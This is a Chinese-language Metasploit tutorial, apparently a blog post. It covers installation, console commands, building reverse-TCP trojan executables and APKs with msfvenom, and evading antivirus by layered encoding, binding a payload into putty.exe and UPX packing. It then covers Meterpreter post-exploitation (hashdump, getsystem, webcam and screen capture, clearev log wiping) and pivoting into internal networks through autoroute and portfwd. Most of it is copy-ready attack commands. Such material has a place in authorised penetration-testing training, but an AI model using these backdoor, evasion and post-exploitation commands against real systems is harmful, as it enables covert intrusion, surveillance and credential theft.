0. Metasploit简介
Metasploit是一款开源的渗透测试框架平台,到目前为止,msf已经内置了数千个已披露的漏洞相关的模块和渗透测试工具,模块使用ruby语言编写,这使得使用者能够根据需要对模块进行适当修改,甚至是调用自己写的测试模块。选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。
1. Metasploit安装
Windows平台
首先从官方网站下载安装程序:
http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe
默认端口:3650
- 关闭杀毒软件后以管理员身份运行安装程序,安装过程会附带安装PostgreSQL数据库用以存储metasploit内各模块,载荷等索引,加快搜索速度
- 安装完成后,在桌面生成Metasploit的快捷方式,右键以管理员身份运行将打开cmd并运行Metasploit控制台
- Windows下启动Metasploit时加载时间较长,若无反应请耐心等待3-5分钟
- Windows平台上,Metasploit还提供了Web访问界面,实现图形化的操作
Linux平台
从github获取
- git clone https://github.com/rapid7/metasploit-framework.git
- 切换到metasploit-framework目录,赋予msfconsol执行权限并启动
- cd metasploit-framework && chmod +x msfconsole && ./msfconsole
- 使用以下命令下载一键式安装程序,具体安装进度试网络情况
- cd /opt && curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
- chmod +x msfinstall && ./msfinstall
Kali Linux自带了Metasploit以及自动化渗透工具Armitage
Android平台
安卓安装Metasploit实际上是先在安卓上安装一个linux子系统,然后再在此基础上安装Metasploit,虽然过程复杂繁琐,但在企业网络环境下进行渗透测时,拎着一台笔记本接入网络也许会太过显眼,这种情况下在安卓手机或平板上安装Metasploit也不失为一种选择
前提:安卓手机或平板需要root权限
通常选择安装Termux作为基本环境,启动后会联网下载系统,具体时间视网络环境长短不一,所以你可以选择在这时候睡个午觉什么的 =.=#
Termux使用apt包管理器,执行以下命令更新
apt-get update && apt-get upgrade -y && apt dist-upgrade -y
接下来的安装Metasploit和上述linux平台安装相同
2. 使用Metasploit进行渗透测试
Terminal下msf常用命令简介
msfdb init msf数据库初始化 apt install metasploit framework msf更新 msfVENOM 多平台攻击载荷生成器 msf-nasm_shell 将汇编指令转换成为对应的16进制机器码 msfconsole 打开msf终端
msf终端下常用命令简介
db_status 查看数msf据库连接状态,连接数据库能够优化搜索等过程 db_rebuild_cache 重建缓存,将模块等索引重新存入数据库 db_nmap 调用nmap扫描,并将扫描结果存入数据库 help [db_connect] 显示命令的帮助信息 search [module] 搜索含有关键字的模块 use [module] 选择使用一个模块(以ms17_010永恒之蓝为例) show payload 显示该模块支持的payload show options 显示该模块需要设置的参数(其中required为no的表示不是必须的参数) info 如果觉得show命令显示的不够完整可以直接输入info查看详细详细 set [opt] 使用模块后,设置模块所需要的参数的值(对应使用unset取消设置的值) setg [opt] 设置全局参数,对于ip之类的参数可以设置为全局,当切换模块后就不需要再次设置ip参数(对应使用unsetg取消设置) back 返回上级状态 exploit/run 两个命令都表示运行攻击模块 sessions 查看当前连接的会话
3. 使用msfvenom生成木马文件
tips:关于payload的选择,出于防火墙等多种原因,目标主机上可能会限制外网对内网一些端口的访问,甚至是只开放一些端口然后关闭其他所有端口。在这种情况下,让目标主机回连攻击者成为更好的一种选择,这种模式相当于目标主机自己发出一个对外的连接请求,属于正常的流量,因此可以绕过安全设置,所以在选择payload时普遍选择使用带reverse的payload。一般32位使用windows/meterpreter_reverse_tcp 而64位的使用windows/x64/meterpreter_reverse_tcp。当然仍然需要根据不同的需求选择不同的载荷
查看可使用的载荷/编码器/nops/所有列表
msfvenom -l payload/encoders/nops/all
查看可生成的木马文件格式,使用-f 指定木马格式
msfvenom --help-format
生成64位的exe木马
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -a x64 -f exe -o backdoor_raw.exe
生成安卓木马
msfvenom -p android/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -o backdoor_raw.apk
msf终端监听会连回话
use exploit/multi/handler
该模块用于接收回连会话,一般只需要设置监听主机和端口号
4. 木马免杀
使用多个编码器混合进行多重编码
不推荐使用,免杀率低,编码时间长,且生成的木马可能会出现无法运行或运行后无法回连到攻击端的情况
“-f raw” 表示生成原始木马,这种通过管道生成的木马只需要不断传递,所以只需要在最后一条命令指定生成的格式,而在此之前都应该使用raw的原始木马
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.16.99 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -i 5 -a x86 --platform windows -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -f exe -o backdoor_encoder.exe
捆绑到正常文件中
推荐使用,捆绑木马到正常文件后能够使用户放松警惕,因此在实际生活中,我们应该注意比对文件与官方提供的hash值
选择捆绑目标时,有可能出现捆绑后无法运行的情况,这种情况下可以尝试使用编码器,或者更换捆绑目标,这里以putty作为例子
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -x putty.exe -k -f exe -o backdoor_putty.exe
加壳
推荐使用,加壳技术能够一定程度上绕过杀软的检测,这里使用linux上普遍使用的upx加壳为例,windows上加壳的工具也有许多,可自行选择
upx -5 backdoor_raw.elf -5 表示压缩等级(1-9),详细命令参考upx -h
上述方法综合使用
附上一个在线检测木马的网站: http://www.virscan.org/
5. meterpreter后渗透利用
通过exploit/multi/handler模块监听,并与目标主机建立连接后,能够使用meterpreter进行后渗透利用
pwd 打印当前工作目录 sysinfo 查看系统信息 ps 查看当前目标机上运行的进程列表和pid webcam_snap 调用相机拍摄照片(使用webcam_stream能够通过浏览器模拟录像机,实现实时监控) run vnc 运行vnc远程查看屏幕(run screen_unlock实现远程控制) run post/windows/manage/enable_rdp 如果目标主机是windows系统,使用该命令开启目标的远程桌面3389 screenshot 截取目标主机当前屏幕 getuid 获取当前权限的用户id getsystem 获取system权限 hashdump 获取用户名与hash口令 shell 获取目标主机shell(windows环境下中文乱码的解决办法:chcp 65001 Ctrl+Z 退出shell模式,返回到meterpreter upload 上传一个文件 download 下载一个文件 excute 执行目标系统中的文件(-f 指定文件,-i执行可交互模式,-H隐藏窗口) clearev 清除日志 background 将Meterpreter放入后台(使用session -i重新连接到会话)
6. Meterpreter进行内网渗透简介
在渗透过程中,当你拿到一台能够连接公网的的主机的权限时,这台主机可能还连接着一个内部的局域网络,而且这个局域网内的其他主机没有对外访问的权限。这是一种很常见的局域网模式,通常一些无法连接外网的主机内可能存放着一些敏感文件,此时可以通过以及控制的那台主机作为攻击者访问内网的跳板,用来实施对内网的渗透
添加到达内网的路由
run get_local_subnets 获取目标主机上的子网状态,其中192.168.16.0和攻击机在同一个网段,169.254.0.0是vritualbox的内部网卡模式 run autoroute -s 169.254.0.0/16 1 使用autoroute模块添加到达内网的路由经session 1转发 run autoroute -p 查看当前的路由表,可以看到发往169.254.0.0网段的流量都将通过session 1转发
接下来就可以在msf下使用db_nmap扫描内网存活主机,针对内网的开放端口进行攻击
portfwd端口转发
端口转发能够将内网端口转发到本地主机的端口,相当于virtualbox的端口映射功能。
portfwd -h 查看帮助信息 portfwd add -l 7070 -r 192.168.16.59 -p 3389 将目标主机192.168.16.59的3389转发到本地主机的7070端口 rdesktop 127.0.0.1:7070 端口转发成功后就可以从本地端口连接rdp
参考书籍《Metasploit The Penetration Tester’s Guide.》《Metasploit渗透测试指南(修订版)》